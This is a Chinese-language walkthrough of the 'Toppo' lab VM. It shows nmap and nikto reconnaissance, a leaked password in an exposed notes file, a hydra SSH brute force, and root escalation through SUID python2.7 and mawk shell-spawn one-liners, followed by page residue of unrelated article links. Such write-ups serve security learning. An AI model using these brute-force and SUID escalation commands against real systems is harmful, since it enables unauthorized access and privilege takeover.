关于

信息收集

  • vmnet8网卡,IP:192.168.131.144,开放web,ssh服务

➜  ~ ip a show dev vmnet8
5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
inet 192.168.131.1/24 brd 192.168.131.255 scope global vmnet8
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fec0:8/64 scope link
valid_lft forever preferred_lft forever
➜ ~ nmap -sn 192.168.131.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-30 19:46 CST
Nmap scan report for 192.168.131.1
Host is up (0.00055s latency).
Nmap scan report for 192.168.131.144
Host is up (0.00093s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.08 seconds
➜ ~ nmap -T4 -A 192.168.131.144
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-30 20:01 CST
Nmap scan report for 192.168.131.144
Host is up (0.43s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41760/udp status
|_ 100024 1 44661/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
  • nikto发现了admin目录还有一个mail目录。
➜  ~ nikto -h http://192.168.131.144/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.131.144
+ Target Hostname: 192.168.131.144
+ Target Port: 80
+ Start Time: 2018-10-30 20:04:51 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2018-10-30 20:05:10 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • admin目录里有一个notes.txt文件,这是他以前的密码:/ 12345ted123。而且提到了技术,钓鱼和足球。社工有用。
➜  ~ curl http://192.168.131.144/admin/notes.txt
Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer . ➜ ~

爆破ssh

  • 生成字典爆破ssh,用户名ted,别问我怎么知道的全网都是猜出来的,只能说出题人没给太多的提示,直觉。
  • hydra爆破得到密码为12345ted123
➜  pydictor git:(master) ✗ python pydictor.py -plug scratch http://192.168.131.144/admin/notes.txt
_ _ _
_ __ _ _ __| (_) ___| |_ ___ _ __
| '_ \| | | |/ _` | |/ __| __/ _ \| '__|
| |_) | |_| | (_| | | (__| || (_) | |
| .__/ \__, |\__,_|_|\___|\__\___/|_|
|_| |___/ 2.1.1#dev [+] A total of :11 lines
[+] Store in :/home/kali-team/Kali-Team/password-recovery/pydictor/results/scratch_214601.txt
[+] Cost :0.0451 seconds
➜ pydictor git:(master) ✗ cat results/scratch_214601.txt
myself
password
12345ted123
outdated
technology
thing
prefer
fishing
watching
soccer
admin ➜ ~ hydra -l ted -P Kali-Team/password-recovery/pydictor/results/scratch_215638.txt ssh://192.168.131.144
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-30 21:57:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries (l:1/p:11), ~1 try per task
[DATA] attacking ssh://192.168.131.144:22/
[22][ssh] host: 192.168.131.144 login: ted password: 12345ted123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-30 21:57:21

提权GetFlag

  • 找开启了SUID权限的应用
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
  • 找不用root密码就可以用sudo的应用,发现mawk,和Python2.7都不用。
ted@Toppo:~$ cat /etc/sudoers
ted ALL=(ALL) NOPASSWD: /usr/bin/awk ted@Toppo:~$
    1. py,
    2. mawk
ted@Toppo:/bin$ python -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth) ted@Toppo:/bin$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted@Toppo:/bin$ mawk 'BEGIN {system("/bin/sh")}'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth) # cat /root/flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__| Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

记录

  • 在测试过程中我发现,Python有root权限,执行bash和执行dash返回的权限不一样,bash返回的是普通权限,而dash返回的是root权限。发了三次朋友圈求助终于明白了。其实bash加参数-p使用Posix模式也可以获取root权限。这里接触到了一个新的知识是POSIX 1003.2规范的标准,有兴趣的可以去搜索一下。我就不在这扯了。估计能写几页。
ted@Toppo:~$ python -c 'import os;os.system("/bin/bash -p")'
bash-4.3# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3# exit
exit
ted@Toppo:~$ python -c 'import os;os.system("/bin/bash")'
bash-4.3$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ exit
exit
ted@Toppo:~$ python -c 'import os;os.system("/bin/dash")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# exit root 1926 0.0 1.0 10988 5420 ? Ss 11:05 0:00 \_ sshd: ted [priv]
ted 1928 0.0 0.7 10988 4088 ? S 11:05 0:00 \_ sshd: ted@pts/0
ted 1929 0.0 0.8 6376 4288 pts/0 Ss 11:05 0:00 \_ -bash
root 2011 0.0 1.1 9816 6120 pts/0 S+ 11:13 0:00 \_ python -c import pty;pty.spawn("/bin/bash")
ted 2012 0.0 0.6 5448 3528 pts/1 Ss 11:13 0:00 \_ /bin/bash
ted 2013 0.0 0.4 4768 2548 pts/1 R+ 11:13 0:00 \_ ps aux f
root 1926 0.0 1.0 10988 5420 ? Ss 11:05 0:00 \_ sshd: ted [priv]
ted 1928 0.0 0.7 10988 4084 ? S 11:05 0:00 \_ sshd: ted@pts/0
ted 1929 0.0 0.8 6376 4288 pts/0 Ss 11:05 0:00 \_ -bash
root 1998 0.0 1.1 9816 6012 pts/0 S+ 11:11 0:00 \_ python -c import pty;pty.spawn("/bin/dash")
root 1999 0.0 0.2 2272 1380 pts/1 Ss 11:11 0:00 \_ /bin/dash
root 2001 0.0 0.4 4768 2416 pts/1 R+ 11:12 0:00 \_ ps aux f

Write-up-Toppo的更多相关文章

  1. bzoj 1185 旋转卡壳 最小矩形覆盖

    题目大意 就是求一个最小矩形覆盖,逆时针输出其上面的点 这里可以看出,那个最小的矩形覆盖必然有一条边经过其中凸包上的两个点,另外三条边必然至少经过其中一个点,而这样的每一个点逆时针走一遍都满足单调性 ...

随机推荐

  1. 基于SILVACO ATLAS的a-IGZO薄膜晶体管二维器件仿真(08)

    进展比较慢啊... 根据江南大学硕士论文IGZO/IZO双有源层薄膜晶体管特性的模拟研究: 其中, gCBa:类受主导带尾态 gVBd:类施主价带尾态 gGd:类施主氧空位态 NDeep:价带尾深施主 ...

  2. Docker安装、命令详情、层级架构、docker服务启动失败解决方法

    容器背景: 层级架构:  容器对比传统化虚拟机: 可以把docker理解成是一款自带软件(比如:nignx.tomcat.....)的镜像操作系统(首先是要下载镜像) 以下是Windows环境安装Do ...

  3. python3+requests+BeautifulSoup+mysql爬取豆瓣电影top250

    基础页面:https://movie.douban.com/top250 代码: from time import sleep from requests import get from bs4 im ...

  4. redhat 7.6安装kvm

    安装 yum install qemu-kvm libvirt virt-install virt-manager openssh-askpass yum install qemu-kvm-tools ...

  5. Codeforces 1311F Moving Points

    题目链接 根据题意,d是两个点的最短距离,分析知,假设\(x_i\)<\(x_j\), 若\(v_i\)>\(v_j\),那么d(i,j)一定为0,因为i一定能追上j,否则,d(i,j)就 ...

  6. jdk基础提升

    1. treeMap,treesSet 作用:1具有对应普通的Map,Set的功能,2.能排序Map和Set  (依赖树的结构进行排序---中序循环) TreeSet<String> tr ...

  7. Python学习笔记:变量

    什么是变量? 一般的理解是,变量是一个存储数据的容器 但是在python中的变量只存储数据的引用 变量的特性: 并不直接存储数据,而是引用着某个具体的数据 我们可以人为改变这个引用 定义变量 方式 变 ...

  8. vmware虚拟机linux添加硬盘后先分区再格式化操作方法

    先在虚拟机里填加硬盘,如图. 进入linux后台,df-l ,没有显示sdc盘,更切换的是,在fdisk中,却有sdc 看fdisk -l,确实有sdc. 说明sdc还没有分区,也没有格式化,也没有挂 ...

  9. QSS基础-设置控件样式

    1.QSS基础-设置同类控件样式'''QSS基础:Qt Style SheetQt样式表用于设置控件的样式和风格(比如控件的背景色,字体颜色,字体大小等)和CSS的功能比较相似,功能相似''' fro ...

  10. FastDFS上传文件访问url地址直接下载

    fdfs 存储节点storage安装nginx,修改nginx配置文件 location ~/group[1-9]/M00 {  if ( $query_string ~* ^(.*)paramete ...